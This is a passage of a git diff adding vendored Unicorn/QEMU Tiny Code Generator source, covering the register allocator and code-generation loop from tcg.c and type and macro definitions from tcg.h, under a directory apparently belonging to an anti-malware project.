TCGArg arg; + const TCGArgConstraint *arg_ct; + TCGTemp *ts; + TCGArg new_args[TCG_MAX_OP_ARGS]; + int const_args[TCG_MAX_OP_ARGS]; + + nb_oargs = def->nb_oargs; + nb_iargs = def->nb_iargs; + + /* copy constants */ + memcpy(new_args + nb_oargs + nb_iargs, + args + nb_oargs + nb_iargs, + sizeof(TCGArg) * def->nb_cargs); + + /* satisfy input constraints */ + tcg_regset_set(allocated_regs, s->reserved_regs); + for(k = 0; k < nb_iargs; k++) { + i = def->sorted_args[nb_oargs + k]; + arg = args[i]; + arg_ct = &def->args_ct[i]; + ts = &s->temps[arg]; + if (ts->val_type == TEMP_VAL_MEM) { + reg = tcg_reg_alloc(s, arg_ct->u.regs, allocated_regs); + tcg_out_ld(s, ts->type, reg, ts->mem_reg, ts->mem_offset); + ts->val_type = TEMP_VAL_REG; + ts->reg = reg; + ts->mem_coherent = 1; + s->reg_to_temp[reg] = arg; + } else if (ts->val_type == TEMP_VAL_CONST) { + if (tcg_target_const_match(ts->val, ts->type, arg_ct)) { + /* constant is OK for instruction */ + const_args[i] = 1; + new_args[i] = ts->val; + goto iarg_end; + } else { + /* need to move to a register */ + reg = tcg_reg_alloc(s, arg_ct->u.regs, allocated_regs); + tcg_out_movi(s, ts->type, reg, ts->val); + ts->val_type = TEMP_VAL_REG; + ts->reg = reg; + ts->mem_coherent = 0; + s->reg_to_temp[reg] = arg; + } + } + assert(ts->val_type == TEMP_VAL_REG); + if (arg_ct->ct & TCG_CT_IALIAS) { + if (ts->fixed_reg) { + /* if fixed register, we must allocate a new register + if the alias is not the same register */ + if (arg != args[arg_ct->alias_index]) + goto allocate_in_reg; + } else { + /* if the input is aliased to an output and if it is + not dead after the instruction, we must allocate + a new register and move it */ + if (!IS_DEAD_ARG(i)) { + goto allocate_in_reg; + } + } + } + reg = ts->reg; + if (tcg_regset_test_reg(arg_ct->u.regs, reg)) { + /* nothing to do : the constraint is satisfied */ + } else { + allocate_in_reg: + /* allocate a new register matching the constraint + and move the temporary register into it */ + reg = tcg_reg_alloc(s, arg_ct->u.regs, allocated_regs); + tcg_out_mov(s, ts->type, reg, ts->reg); + } + new_args[i] = reg; + const_args[i] = 0; + tcg_regset_set_reg(allocated_regs, reg); + iarg_end: ; + } + + /* mark dead temporaries and free the associated registers */ + for (i = nb_oargs; i < nb_oargs + nb_iargs; i++) { + if (IS_DEAD_ARG(i)) { + temp_dead(s, args[i]); + } + } + + if (def->flags & TCG_OPF_BB_END) { + tcg_reg_alloc_bb_end(s, allocated_regs); + } else { + if (def->flags & TCG_OPF_CALL_CLOBBER) { + /* XXX: permit generic clobber register list ? */ + for(reg = 0; reg < TCG_TARGET_NB_REGS; reg++) { + if (tcg_regset_test_reg(s->tcg_target_call_clobber_regs, reg)) { + tcg_reg_free(s, reg); + } + } + } + if (def->flags & TCG_OPF_SIDE_EFFECTS) { + /* sync globals if the op has side effects and might trigger + an exception. */ + sync_globals(s, allocated_regs); + } + + /* satisfy the output constraints */ + tcg_regset_set(allocated_regs, s->reserved_regs); + for(k = 0; k < nb_oargs; k++) { + i = def->sorted_args[k]; + arg = args[i]; + arg_ct = &def->args_ct[i]; + ts = &s->temps[arg]; + if (arg_ct->ct & TCG_CT_ALIAS) { + reg = new_args[arg_ct->alias_index]; + } else { + /* if fixed register, we try to use it */ + reg = ts->reg; + if (ts->fixed_reg && + tcg_regset_test_reg(arg_ct->u.regs, reg)) { + goto oarg_end; + } + reg = tcg_reg_alloc(s, arg_ct->u.regs, allocated_regs); + } + tcg_regset_set_reg(allocated_regs, reg); + /* if a fixed register is used, then a move will be done afterwards */ + if (!ts->fixed_reg) { + if (ts->val_type == TEMP_VAL_REG) { + s->reg_to_temp[ts->reg] = -1; + } + ts->val_type = TEMP_VAL_REG; + ts->reg = reg; + /* temp value is modified, so the value kept in memory is + potentially not the same */ + ts->mem_coherent = 0; + s->reg_to_temp[reg] = arg; + } + oarg_end: + new_args[i] = reg; + } + } + + /* emit instruction */ + tcg_out_op(s, opc, new_args, const_args); + + /* move the outputs in the correct register if needed */ + for(i = 0; i < nb_oargs; i++) { + ts = &s->temps[args[i]]; + reg = new_args[i]; + if (ts->fixed_reg && ts->reg != reg) { + tcg_out_mov(s, ts->type, ts->reg, reg); + } + if (NEED_SYNC_ARG(i)) { + tcg_reg_sync(s, reg); + } + if (IS_DEAD_ARG(i)) { + temp_dead(s, args[i]); + } + } +} + +#ifdef TCG_TARGET_STACK_GROWSUP +#define STACK_DIR(x) (-(x)) +#else +#define STACK_DIR(x) (x) +#endif + +static int tcg_reg_alloc_call(TCGContext *s, const TCGOpDef *def, + TCGOpcode opc, const TCGArg *args, + uint16_t dead_args, uint8_t sync_args) +{ + int nb_iargs, nb_oargs, flags, nb_regs, i, reg, nb_params; + TCGArg arg; + TCGTemp *ts; + intptr_t stack_offset; + size_t call_stack_size; + tcg_insn_unit *func_addr; + int allocate_args; + TCGRegSet allocated_regs; + + arg = *args++; + + nb_oargs = arg >> 16; + nb_iargs = arg & 0xffff; + nb_params = nb_iargs; + + func_addr = (tcg_insn_unit *)(intptr_t)args[nb_oargs + nb_iargs]; + flags = args[nb_oargs + nb_iargs + 1]; + + nb_regs = ARRAY_SIZE(tcg_target_call_iarg_regs); +#ifdef _UC_MSVC_ARRAY_DUMMY + // do this because msvc cannot have arrays with 0 entries. + /* ref: tcg/i386/tcg-target.c: tcg_target_call_iarg_regs, + it is added a dummy value, set back to 0. */ + nb_regs = 0; +#endif + if (nb_regs > nb_params) { + nb_regs = nb_params; + } + + /* assign stack slots first */ + call_stack_size = (nb_params - nb_regs) * sizeof(tcg_target_long); + call_stack_size = (call_stack_size + TCG_TARGET_STACK_ALIGN - 1) & + ~(TCG_TARGET_STACK_ALIGN - 1); + allocate_args = (call_stack_size > TCG_STATIC_CALL_ARGS_SIZE); + if (allocate_args) { + /* XXX: if more than TCG_STATIC_CALL_ARGS_SIZE is needed, + preallocate call stack */ + return -1; + } + + stack_offset = TCG_TARGET_CALL_STACK_OFFSET; + for(i = nb_regs; i < nb_params; i++) { + arg = args[nb_oargs + i]; +#ifdef TCG_TARGET_STACK_GROWSUP + stack_offset -= sizeof(tcg_target_long); +#endif + if (arg != TCG_CALL_DUMMY_ARG) { + ts = &s->temps[arg]; + if (ts->val_type == TEMP_VAL_REG) { + tcg_out_st(s, ts->type, ts->reg, TCG_REG_CALL_STACK, stack_offset); + } else if (ts->val_type == TEMP_VAL_MEM) { + reg = tcg_reg_alloc(s, (TCGRegSet)s->tcg_target_available_regs[ts->type], + s->reserved_regs); + /* XXX: not correct if reading values from the stack */ + tcg_out_ld(s, ts->type, reg, ts->mem_reg, ts->mem_offset); + tcg_out_st(s, ts->type, reg, TCG_REG_CALL_STACK, stack_offset); + } else if (ts->val_type == TEMP_VAL_CONST) { + reg = tcg_reg_alloc(s, (TCGRegSet)s->tcg_target_available_regs[ts->type], + s->reserved_regs); + /* XXX: sign extend may be needed on some targets */ + tcg_out_movi(s, ts->type, reg, ts->val); + tcg_out_st(s, ts->type, reg, TCG_REG_CALL_STACK, stack_offset); + } else { + return -1; + } + } +#ifndef TCG_TARGET_STACK_GROWSUP + stack_offset += sizeof(tcg_target_long); +#endif + } + + /* assign input registers */ + tcg_regset_set(allocated_regs, s->reserved_regs); + for(i = 0; i < nb_regs; i++) { + arg = args[nb_oargs + i]; + if (arg != TCG_CALL_DUMMY_ARG) { + ts = &s->temps[arg]; + reg = tcg_target_call_iarg_regs[i]; + tcg_reg_free(s, reg); + if (ts->val_type == TEMP_VAL_REG) { + if (ts->reg != reg) { + tcg_out_mov(s, ts->type, reg, ts->reg); + } + } else if (ts->val_type == TEMP_VAL_MEM) { + tcg_out_ld(s, ts->type, reg, ts->mem_reg, ts->mem_offset); + } else if (ts->val_type == TEMP_VAL_CONST) { + /* XXX: sign extend ? */ + tcg_out_movi(s, ts->type, reg, ts->val); + } else { + return -1; + } + tcg_regset_set_reg(allocated_regs, reg); + } + } + + /* mark dead temporaries and free the associated registers */ + for(i = nb_oargs; i < nb_iargs + nb_oargs; i++) { + if (IS_DEAD_ARG(i)) { + temp_dead(s, args[i]); + } + } + + /* clobber call registers */ + for(reg = 0; reg < TCG_TARGET_NB_REGS; reg++) { + if (tcg_regset_test_reg(s->tcg_target_call_clobber_regs, reg)) { + tcg_reg_free(s, reg); + } + } + + /* Save globals if they might be written by the helper, sync them if + they might be read. */ + if (flags & TCG_CALL_NO_READ_GLOBALS) { + /* Nothing to do */ + } else if (flags & TCG_CALL_NO_WRITE_GLOBALS) { + sync_globals(s, allocated_regs); + } else { + save_globals(s, allocated_regs); + } + + tcg_out_call(s, func_addr); + + /* assign output registers and emit moves if needed */ + for(i = 0; i < nb_oargs; i++) { + arg = args[i]; + ts = &s->temps[arg]; + reg = tcg_target_call_oarg_regs[i]; + assert(s->reg_to_temp[reg] == -1); + + if (ts->fixed_reg) { + if (ts->reg != reg) { + tcg_out_mov(s, ts->type, ts->reg, reg); + } + } else { + if (ts->val_type == TEMP_VAL_REG) { + s->reg_to_temp[ts->reg] = -1; + } + ts->val_type = TEMP_VAL_REG; + ts->reg = reg; + ts->mem_coherent = 0; + s->reg_to_temp[reg] = arg; + if (NEED_SYNC_ARG(i)) { + tcg_reg_sync(s, reg); + } + if (IS_DEAD_ARG(i)) { + temp_dead(s, args[i]); + } + } + } + + return nb_iargs + nb_oargs + def->nb_cargs + 1; +} + +#ifdef CONFIG_PROFILER + +static void dump_op_count(void) +{ + int i; + + for(i = INDEX_op_end; i < NB_OPS; i++) { + qemu_log("%s %" PRId64 "\n", s->tcg_op_defs[i].name, tcg_table_op_count[i]); + } +} +#endif + + +static inline int tcg_gen_code_common(TCGContext *s, + tcg_insn_unit *gen_code_buf, + long search_pc) +{ + TCGOpcode opc; + int op_index; + const TCGOpDef *def; + const TCGArg *args; + int ret; + +#ifdef DEBUG_DISAS + if (unlikely(qemu_loglevel_mask(CPU_LOG_TB_OP))) { + qemu_log("OP:\n"); + tcg_dump_ops(s); + qemu_log("\n"); + } +#endif + +#ifdef CONFIG_PROFILER + s->opt_time -= profile_getclock(); +#endif + +#ifdef USE_TCG_OPTIMIZATIONS + s->gen_opparam_ptr = + tcg_optimize(s, s->gen_opc_ptr, s->gen_opparam_buf, s->tcg_op_defs); + if (s->gen_opparam_ptr == NULL) { + tcg_out_tb_finalize(s); + return -2; + } +#endif + +#ifdef CONFIG_PROFILER + s->opt_time += profile_getclock(); + s->la_time -= profile_getclock(); +#endif + + tcg_liveness_analysis(s); + +#ifdef CONFIG_PROFILER + s->la_time += profile_getclock(); +#endif + +#ifdef DEBUG_DISAS + if (unlikely(qemu_loglevel_mask(CPU_LOG_TB_OP_OPT))) { + qemu_log("OP after optimization and liveness analysis:\n"); + tcg_dump_ops(s); + qemu_log("\n"); + } +#endif + + tcg_reg_alloc_start(s); + + s->code_buf = gen_code_buf; + s->code_ptr = gen_code_buf; + + tcg_out_tb_init(s); + + args = s->gen_opparam_buf; + op_index = 0; + + for(;;) { + opc = s->gen_opc_buf[op_index]; +#ifdef CONFIG_PROFILER + tcg_table_op_count[opc]++; +#endif + def = &s->tcg_op_defs[opc]; +#if 0 + printf("%s: %d %d %d\n", def->name, + def->nb_oargs, def->nb_iargs, def->nb_cargs); + // dump_regs(s); +#endif + switch(opc) { + case INDEX_op_mov_i32: + case INDEX_op_mov_i64: + tcg_reg_alloc_mov(s, def, args, s->op_dead_args[op_index], + s->op_sync_args[op_index]); + break; + case INDEX_op_movi_i32: + case INDEX_op_movi_i64: + tcg_reg_alloc_movi(s, args, s->op_dead_args[op_index], + s->op_sync_args[op_index]); + break; + case INDEX_op_debug_insn_start: + /* debug instruction */ + break; + case INDEX_op_nop: + case INDEX_op_nop1: + case INDEX_op_nop2: + case INDEX_op_nop3: + break; + case INDEX_op_nopn: + args += args[0]; + goto next; + case INDEX_op_discard: + temp_dead(s, args[0]); + break; + case INDEX_op_set_label: + tcg_reg_alloc_bb_end(s, s->reserved_regs); + tcg_out_label(s, args[0], s->code_ptr); + break; + case INDEX_op_call: + ret = tcg_reg_alloc_call(s, def, opc, args, + s->op_dead_args[op_index], + s->op_sync_args[op_index]); + if (ret == -1) { + goto the_end; + } else { + args += ret; + } + goto next; + case INDEX_op_end: + goto the_end; + default: + /* Sanity check that we've not introduced any unhandled opcodes. */ + if (def->flags & TCG_OPF_NOT_PRESENT) { + goto the_end; + } + /* Note: in order to speed up the code, it would be much + faster to have specialized register allocator functions for + some common argument patterns */ + tcg_reg_alloc_op(s, def, opc, args, s->op_dead_args[op_index], + s->op_sync_args[op_index]); + break; + } + args += def->nb_args; + next: + if (search_pc >= 0 && (size_t)search_pc < tcg_current_code_size(s)) { + return op_index; + } + op_index++; +#ifndef NDEBUG + check_regs(s); +#endif + } + the_end: + /* Generate TB finalization at the end of block */ + tcg_out_tb_finalize(s); + return -1; +} + +int tcg_gen_code(TCGContext *s, tcg_insn_unit *gen_code_buf) // qq +{ + int ret; +#ifdef CONFIG_PROFILER + { + int n; + n = (s->gen_opc_ptr - s->gen_opc_buf); + s->op_count += n; + if (n > s->op_count_max) + s->op_count_max = n; + + s->temp_count += s->nb_temps; + if (s->nb_temps > s->temp_count_max) + s->temp_count_max = s->nb_temps; + } +#endif + + //printf("====== before gen code\n"); + //tcg_dump_ops(s); + ret = tcg_gen_code_common(s, gen_code_buf, -1); // qq + if (ret == -2) { + return -1; + } + + //printf("====== after gen code\n"); + //tcg_dump_ops(s); + + /* flush instruction cache */ + flush_icache_range((uintptr_t)s->code_buf, (uintptr_t)s->code_ptr); + + return tcg_current_code_size(s); +} + +/* Return the index of the micro operation such as the pc after is < + offset bytes from the start of the TB. The contents of gen_code_buf must + not be changed, though writing the same values is ok. + Return -1 if not found. */ +int tcg_gen_code_search_pc(TCGContext *s, tcg_insn_unit *gen_code_buf, + long offset) +{ + return tcg_gen_code_common(s, gen_code_buf, offset); +} + +#ifdef CONFIG_PROFILER +void tcg_dump_info(FILE *f, fprintf_function cpu_fprintf) +{ +#if 0 + TCGContext *s = &tcg_ctx; + int64_t tot; + + tot = s->interm_time + s->code_time; + cpu_fprintf(f, "JIT cycles %" PRId64 " (%0.3f s at 2.4 GHz)\n", + tot, tot / 2.4e9); + cpu_fprintf(f, "translated TBs %" PRId64 " (aborted=%" PRId64 " %0.1f%%)\n", + s->tb_count, + s->tb_count1 - s->tb_count, + s->tb_count1 ? (double)(s->tb_count1 - s->tb_count) / s->tb_count1 * 100.0 : 0); + cpu_fprintf(f, "avg ops/TB %0.1f max=%d\n", + s->tb_count ? (double)s->op_count / s->tb_count : 0, s->op_count_max); + cpu_fprintf(f, "deleted ops/TB %0.2f\n", + s->tb_count ? + (double)s->del_op_count / s->tb_count : 0); + cpu_fprintf(f, "avg temps/TB %0.2f max=%d\n", + s->tb_count ? + (double)s->temp_count / s->tb_count : 0, + s->temp_count_max); + + cpu_fprintf(f, "cycles/op %0.1f\n", + s->op_count ? (double)tot / s->op_count : 0); + cpu_fprintf(f, "cycles/in byte %0.1f\n", + s->code_in_len ? (double)tot / s->code_in_len : 0); + cpu_fprintf(f, "cycles/out byte %0.1f\n", + s->code_out_len ? (double)tot / s->code_out_len : 0); + if (tot == 0) + tot = 1; + cpu_fprintf(f, " gen_interm time %0.1f%%\n", + (double)s->interm_time / tot * 100.0); + cpu_fprintf(f, " gen_code time %0.1f%%\n", + (double)s->code_time / tot * 100.0); + cpu_fprintf(f, "optim./code time %0.1f%%\n", + (double)s->opt_time / (s->code_time ? s->code_time : 1) + * 100.0); + cpu_fprintf(f, "liveness/code time %0.1f%%\n", + (double)s->la_time / (s->code_time ? s->code_time : 1) * 100.0); + cpu_fprintf(f, "cpu_restore count %" PRId64 "\n", + s->restore_count); + cpu_fprintf(f, " avg cycles %0.1f\n", + s->restore_count ? (double)s->restore_time / s->restore_count : 0); + + dump_op_count(); +#endif +} +#else +void tcg_dump_info(FILE *f, fprintf_function cpu_fprintf) +{ + cpu_fprintf(f, "[TCG profiler not compiled]\n"); +} +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/tcg.h b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/tcg.h new file mode 100644 index 0000000..54486e5 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/tcg.h @@ -0,0 +1,1012 @@ +/* + * Tiny Code Generator for QEMU + * + * Copyright (c) 2008 Fabrice Bellard + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ + +#ifndef TCG_H +#define TCG_H + +#include "qemu-common.h" +#include "qemu/bitops.h" +#include "tcg-target.h" +#include "exec/exec-all.h" + +#include "uc_priv.h" + +/* Default target word size to pointer size. */ +#ifndef TCG_TARGET_REG_BITS +# if UINTPTR_MAX == UINT32_MAX +# define TCG_TARGET_REG_BITS 32 +# elif UINTPTR_MAX == UINT64_MAX +# define TCG_TARGET_REG_BITS 64 +# else +# error Unknown pointer size for tcg target +# endif +#endif + +#if TCG_TARGET_REG_BITS == 32 +typedef int32_t tcg_target_long; +typedef uint32_t tcg_target_ulong; +#define TCG_PRIlx PRIx32 +#define TCG_PRIld PRId32 +#elif TCG_TARGET_REG_BITS == 64 +typedef int64_t tcg_target_long; +typedef uint64_t tcg_target_ulong; +#define TCG_PRIlx PRIx64 +#define TCG_PRIld PRId64 +#else +#error unsupported +#endif + +#if TCG_TARGET_NB_REGS <= 32 +typedef uint32_t TCGRegSet; +#elif TCG_TARGET_NB_REGS <= 64 +typedef uint64_t TCGRegSet; +#else +#error unsupported +#endif + +#if TCG_TARGET_REG_BITS == 32 +/* Turn some undef macros into false macros. */ +#define TCG_TARGET_HAS_trunc_shr_i32 0 +#define TCG_TARGET_HAS_div_i64 0 +#define TCG_TARGET_HAS_rem_i64 0 +#define TCG_TARGET_HAS_div2_i64 0 +#define TCG_TARGET_HAS_rot_i64 0 +#define TCG_TARGET_HAS_ext8s_i64 0 +#define TCG_TARGET_HAS_ext16s_i64 0 +#define TCG_TARGET_HAS_ext32s_i64 0 +#define TCG_TARGET_HAS_ext8u_i64 0 +#define TCG_TARGET_HAS_ext16u_i64 0 +#define TCG_TARGET_HAS_ext32u_i64 0 +#define TCG_TARGET_HAS_bswap16_i64 0 +#define TCG_TARGET_HAS_bswap32_i64 0 +#define TCG_TARGET_HAS_bswap64_i64 0 +#define TCG_TARGET_HAS_neg_i64 0 +#define TCG_TARGET_HAS_not_i64 0 +#define TCG_TARGET_HAS_andc_i64 0 +#define TCG_TARGET_HAS_orc_i64 0 +#define TCG_TARGET_HAS_eqv_i64 0 +#define TCG_TARGET_HAS_nand_i64 0 +#define TCG_TARGET_HAS_nor_i64 0 +#define TCG_TARGET_HAS_deposit_i64 0 +#define TCG_TARGET_HAS_movcond_i64 0 +#define TCG_TARGET_HAS_add2_i64 0 +#define TCG_TARGET_HAS_sub2_i64 0 +#define TCG_TARGET_HAS_mulu2_i64 0 +#define TCG_TARGET_HAS_muls2_i64 0 +#define TCG_TARGET_HAS_muluh_i64 0 +#define TCG_TARGET_HAS_mulsh_i64 0 +/* Turn some undef macros into true macros. */ +#define TCG_TARGET_HAS_add2_i32 1 +#define TCG_TARGET_HAS_sub2_i32 1 +#endif + +#ifndef TCG_TARGET_deposit_i32_valid +#define TCG_TARGET_deposit_i32_valid(ofs, len) 1 +#endif +#ifndef TCG_TARGET_deposit_i64_valid +#define TCG_TARGET_deposit_i64_valid(ofs, len) 1 +#endif + +/* Only one of DIV or DIV2 should be defined. */ +#if defined(TCG_TARGET_HAS_div_i32) +#define TCG_TARGET_HAS_div2_i32 0 +#elif defined(TCG_TARGET_HAS_div2_i32) +#define TCG_TARGET_HAS_div_i32 0 +#define TCG_TARGET_HAS_rem_i32 0 +#endif +#if defined(TCG_TARGET_HAS_div_i64) +#define TCG_TARGET_HAS_div2_i64 0 +#elif defined(TCG_TARGET_HAS_div2_i64) +#define TCG_TARGET_HAS_div_i64 0 +#define TCG_TARGET_HAS_rem_i64 0 +#endif + +/* For 32-bit targets, some sort of unsigned widening multiply is required. */ +#if TCG_TARGET_REG_BITS == 32 \ + && !(defined(TCG_TARGET_HAS_mulu2_i32) \ + || defined(TCG_TARGET_HAS_muluh_i32)) +# error "Missing unsigned widening multiply" +#endif + +typedef enum TCGOpcode { +#define DEF(name, oargs, iargs, cargs, flags) INDEX_op_ ## name, +#include "tcg-opc.h" +#undef DEF + NB_OPS, +} TCGOpcode; + +#define tcg_regset_clear(d) (d) = 0 +#define tcg_regset_set(d, s) (d) = (s) +#define tcg_regset_set32(d, reg, val32) (d) |= (val32) << (reg) +#define tcg_regset_set_reg(d, r) (d) |= 1L << (r) +#define tcg_regset_reset_reg(d, r) (d) &= ~(1L << (r)) +#define tcg_regset_test_reg(d, r) (((d) >> (r)) & 1) +#define tcg_regset_or(d, a, b) (d) = (a) | (b) +#define tcg_regset_and(d, a, b) (d) = (a) & (b) +#define tcg_regset_andnot(d, a, b) (d) = (a) & ~(b) +#define tcg_regset_not(d, a) (d) = ~(a) + +#ifndef TCG_TARGET_INSN_UNIT_SIZE +# error "Missing TCG_TARGET_INSN_UNIT_SIZE" +#elif TCG_TARGET_INSN_UNIT_SIZE == 1 +typedef uint8_t tcg_insn_unit; +#elif TCG_TARGET_INSN_UNIT_SIZE == 2 +typedef uint16_t tcg_insn_unit; +#elif TCG_TARGET_INSN_UNIT_SIZE == 4 +typedef uint32_t tcg_insn_unit; +#elif TCG_TARGET_INSN_UNIT_SIZE == 8 +typedef uint64_t tcg_insn_unit; +#else +/* The port better have done this. */ +#endif + + +typedef struct TCGRelocation { + struct TCGRelocation *next; + int type; + tcg_insn_unit *ptr; + intptr_t addend; +} TCGRelocation; + +typedef struct TCGLabel { + int has_value; + union { + uintptr_t value; + tcg_insn_unit *value_ptr; + TCGRelocation *first_reloc; + } u; +} TCGLabel; + +typedef struct TCGPool { + struct TCGPool *next; + int size; + uint8_t QEMU_ALIGN(8, data[0]); +} TCGPool; + +#define TCG_POOL_CHUNK_SIZE 32768 + +#define TCG_MAX_LABELS 512 + +#define TCG_MAX_TEMPS 512 + +/* when the size of the arguments of a called function is smaller than + this value, they are statically allocated in the TB stack frame */ +#define TCG_STATIC_CALL_ARGS_SIZE 128 + +typedef enum TCGType { + TCG_TYPE_I32, + TCG_TYPE_I64, + TCG_TYPE_COUNT, /* number of different types */ + + /* An alias for the size of the host register. */ +#if TCG_TARGET_REG_BITS == 32 + TCG_TYPE_REG = TCG_TYPE_I32, +#else + TCG_TYPE_REG = TCG_TYPE_I64, +#endif + + /* An alias for the size of the native pointer. */ +#if UINTPTR_MAX == UINT32_MAX + TCG_TYPE_PTR = TCG_TYPE_I32, +#else + TCG_TYPE_PTR = TCG_TYPE_I64, +#endif + + /* An alias for the size of the target "long", aka register. */ +#if TARGET_LONG_BITS == 64 + TCG_TYPE_TL = TCG_TYPE_I64, +#else + TCG_TYPE_TL = TCG_TYPE_I32, +#endif +} TCGType; + +/* Constants for qemu_ld and qemu_st for the Memory Operation field. */ +typedef enum TCGMemOp { + MO_8 = 0, + MO_16 = 1, + MO_32 = 2, + MO_64 = 3, + MO_SIZE = 3, /* Mask for the above. */ + + MO_SIGN = 4, /* Sign-extended, otherwise zero-extended. */ + + MO_BSWAP = 8, /* Host reverse endian. */ +#ifdef HOST_WORDS_BIGENDIAN + MO_LE = MO_BSWAP, + MO_BE = 0, +#else + MO_LE = 0, + MO_BE = MO_BSWAP, +#endif +#ifdef TARGET_WORDS_BIGENDIAN + MO_TE = MO_BE, +#else + MO_TE = MO_LE, +#endif + + /* Combinations of the above, for ease of use. */ + MO_UB = MO_8, + MO_UW = MO_16, + MO_UL = MO_32, + MO_SB = MO_SIGN | MO_8, + MO_SW = MO_SIGN | MO_16, + MO_SL = MO_SIGN | MO_32, + MO_Q = MO_64, + + MO_LEUW = MO_LE | MO_UW, + MO_LEUL = MO_LE | MO_UL, + MO_LESW = MO_LE | MO_SW, + MO_LESL = MO_LE | MO_SL, + MO_LEQ = MO_LE | MO_Q, + + MO_BEUW = MO_BE | MO_UW, + MO_BEUL = MO_BE | MO_UL, + MO_BESW = MO_BE | MO_SW, + MO_BESL = MO_BE | MO_SL, + MO_BEQ = MO_BE | MO_Q, + + MO_TEUW = MO_TE | MO_UW, + MO_TEUL = MO_TE | MO_UL, + MO_TESW = MO_TE | MO_SW, + MO_TESL = MO_TE | MO_SL, + MO_TEQ = MO_TE | MO_Q, + + MO_SSIZE = MO_SIZE | MO_SIGN, +} TCGMemOp; + +typedef tcg_target_ulong TCGArg; + +/* Define a type and accessor macros for variables. Using pointer types + is nice because it gives some level of type safely. Converting to and + from intptr_t rather than int reduces the number of sign-extension + instructions that get implied on 64-bit hosts. Users of tcg_gen_* don't + need to know about any of this, and should treat TCGv as an opaque type. + In addition we do typechecking for different types of variables. TCGv_i32 + and TCGv_i64 are 32/64-bit variables respectively. TCGv and TCGv_ptr + are aliases for target_ulong and host pointer sized values respectively. */ + +typedef struct TCGv_i32_d *TCGv_i32; +typedef struct TCGv_i64_d *TCGv_i64; +typedef struct TCGv_ptr_d *TCGv_ptr; + +static inline TCGv_i32 QEMU_ARTIFICIAL MAKE_TCGV_I32(intptr_t i) +{ + return (TCGv_i32)i; +} + +static inline TCGv_i64 QEMU_ARTIFICIAL MAKE_TCGV_I64(intptr_t i) +{ + return (TCGv_i64)i; +} + +static inline TCGv_ptr QEMU_ARTIFICIAL MAKE_TCGV_PTR(intptr_t i) +{ + return (TCGv_ptr)i; +} + +static inline intptr_t QEMU_ARTIFICIAL GET_TCGV_I32(TCGv_i32 t) +{ + return (intptr_t)t; +} + +static inline intptr_t QEMU_ARTIFICIAL GET_TCGV_I64(TCGv_i64 t) +{ + return (intptr_t)t; +} + +static inline intptr_t QEMU_ARTIFICIAL GET_TCGV_PTR(TCGv_ptr t) +{ + return (intptr_t)t; +} + +#if TCG_TARGET_REG_BITS == 32 +#define TCGV_LOW(t) MAKE_TCGV_I32(GET_TCGV_I64(t)) +#define TCGV_HIGH(t) MAKE_TCGV_I32(GET_TCGV_I64(t) + 1) +#endif + +#define TCGV_EQUAL_I32(a, b) (GET_TCGV_I32(a) == GET_TCGV_I32(b)) +#define TCGV_EQUAL_I64(a, b) (GET_TCGV_I64(a) == GET_TCGV_I64(b)) +#define TCGV_EQUAL_PTR(a, b) (GET_TCGV_PTR(a) == GET_TCGV_PTR(b)) + +/* Dummy definition to avoid compiler warnings. */ +#define TCGV_UNUSED_I32(x) x = MAKE_TCGV_I32(-1) +#define TCGV_UNUSED_I64(x) x = MAKE_TCGV_I64(-1) +#define TCGV_UNUSED_PTR(x) x = MAKE_TCGV_PTR(-1) + +#define TCGV_IS_UNUSED_I32(x) (GET_TCGV_I32(x) == -1) +#define TCGV_IS_UNUSED_I64(x) (GET_TCGV_I64(x) == -1) +#define TCGV_IS_UNUSED_PTR(x) (GET_TCGV_PTR(x) == -1) + +/* call flags */ +/* Helper does not read globals (either directly or through an exception). It + implies TCG_CALL_NO_WRITE_GLOBALS. */ +#define TCG_CALL_NO_READ_GLOBALS 0x0010 +/* Helper does not write globals */ +#define TCG_CALL_NO_WRITE_GLOBALS 0x0020 +/* Helper can be safely suppressed if the return value is not used. */ +#define TCG_CALL_NO_SIDE_EFFECTS 0x0040 + +/* convenience version of most used call flags */ +#define TCG_CALL_NO_RWG TCG_CALL_NO_READ_GLOBALS +#define TCG_CALL_NO_WG TCG_CALL_NO_WRITE_GLOBALS +#define TCG_CALL_NO_SE TCG_CALL_NO_SIDE_EFFECTS +#define TCG_CALL_NO_RWG_SE (TCG_CALL_NO_RWG | TCG_CALL_NO_SE) +#define TCG_CALL_NO_WG_SE (TCG_CALL_NO_WG | TCG_CALL_NO_SE) + +/* used to align parameters */ +#define TCG_CALL_DUMMY_TCGV MAKE_TCGV_I32(-1) +#define TCG_CALL_DUMMY_ARG ((TCGArg)(-1)) + +/* Conditions. Note that these are laid out for easy manipulation by + the functions below: + bit 0 is used for inverting; + bit 1 is signed, + bit 2 is unsigned, + bit 3 is used with bit 0 for swapping signed/unsigned. */ +typedef enum { + /* non-signed */ + TCG_COND_NEVER = 0 | 0 | 0 | 0, + TCG_COND_ALWAYS = 0 | 0 | 0 | 1, + TCG_COND_EQ = 8 | 0 | 0 | 0, + TCG_COND_NE = 8 | 0 | 0 | 1, + /* signed */ + TCG_COND_LT = 0 | 0 | 2 | 0, + TCG_COND_GE = 0 | 0 | 2 | 1, + TCG_COND_LE = 8 | 0 | 2 | 0, + TCG_COND_GT = 8 | 0 | 2 | 1, + /* unsigned */ + TCG_COND_LTU = 0 | 4 | 0 | 0, + TCG_COND_GEU = 0 | 4 | 0 | 1, + TCG_COND_LEU = 8 | 4 | 0 | 0, + TCG_COND_GTU = 8 | 4 | 0 | 